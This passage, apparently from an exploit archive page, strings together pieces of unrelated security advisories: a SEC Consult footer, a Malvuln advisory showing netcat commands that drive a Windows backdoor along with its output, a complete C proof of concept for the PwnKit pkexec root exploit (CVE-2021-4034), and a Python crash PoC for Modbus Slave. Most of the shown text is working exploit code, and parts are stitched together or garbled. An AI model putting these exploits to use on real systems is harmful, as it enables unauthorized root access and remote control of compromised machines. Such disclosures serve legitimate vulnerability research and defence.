gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Lukas Eder / @2022<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/290477c9707f64a316888493ae67b1ef.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Antilam.11<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP ports 29559, 47891. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Commands are typically three digits e.g. 001 and perform various actions on the infected host.<br />Type: PE32<br />MD5: 290477c9707f64a316888493ae67b1ef<br />Vuln ID: MVID-2021-0403<br />Dropped files: scandisk.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 47891<br />001<br />001 Windows: C:\WINDOWS<br /> System: C:\WINDOWS\system32<br /> Temp: C:\Users\Victim\AppData\Local\Temp\<br /> Windows: Windows NT 6.2 9200<br /> Windows: 02<br />: DESKTOP-2C3IQHO<br />α: Victim<br /> Windows: English (United States)<br />╨ατ≡: 1547x787<br />NumLock: Off<br />CapsLock: Off<br />ScrollLock: Off<br />╤ΓεßεΣφεσ ∞σ±≥ε φα ΣΦ±Ωσ: 3,722,629,120<br />DESKTOP-2C3IQHO<br />000Taskbar ±Ω≡√δ± ...005<br />000╚ΩεφΩΦ ±Ω≡√ⁿ...006<br />000╫α±√ⁿ...007<br />000Monitor ..008<br />000Ctrl+Alt+Del ...009<br />000ScrollLock ...010<br />000CapsLock ..011<br />000NumLock Γφ...012<br />000CD-ROM ταΩ≡√≥...013<br />000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Γ≡σ∞ ...014<br />000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Σα≥≤...015<br />01508:56 PM|11/17/2021016<br />000Mouse was been unlocked...019<br />020500021<br />021022<br />66022023Shell Experience Host3IQHO\Victim]+ (Administrator)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>/*<br /> * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu><br /> * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034<br /> */<br />#include <stdio.h><br />#include <stdlib.h><br />#include <unistd.h><br /><br />char *shell = <br /> "#include <stdio.h>\n"<br /> "#include <stdlib.h>\n"<br /> "#include <unistd.h>\n\n"<br /> "void gconv() {}\n"<br /> "void gconv_init() {\n"<br /> " setuid(0); setgid(0);\n"<br /> " seteuid(0); setegid(0);\n"<br /> " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"<br /> " exit(0);\n"<br /> "}";<br /><br />int main(int argc, char *argv[]) {<br /> FILE *fp;<br /> system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");<br /> system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");<br /> fp = fopen("pwnkit/pwnkit.c", "w");<br /> fprintf(fp, "%s", shell);<br /> fclose(fp);<br /> system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");<br /> char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };<br /> execve("/usr/bin/pkexec", (char*[]){NULL}, env);<br />}<br /><br /></code></pre>
<pre><code>Vendor has been notified and fixed<br />https://www.modbustools.com/ModSlaveChangeLog.txt<br /><br />tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Steps to reproduce:<br /># 1. - Download and install Modbus Slave<br /># 2. - Run the python script and it will create modbus.txt file.<br /># 3. - Modbus Slave 7.3.1 < 7.4.2<br /># 4. - Connection -> Connect<br /># 5. - Paste the characters of txt file to Registration Key<br /># 6. - press "ok" button<br /># 7. - Crashed<br /><br />#!/usr/bin/python<br /><br />exploit = 'A' * 736<br /><br />try:<br />file = open("Modbus.txt","w")<br />file.write(exploit)<br />file.close()<br /><br />print("POC is created")<br />except:<br />print("POC not created")<br /><br /></code></pre>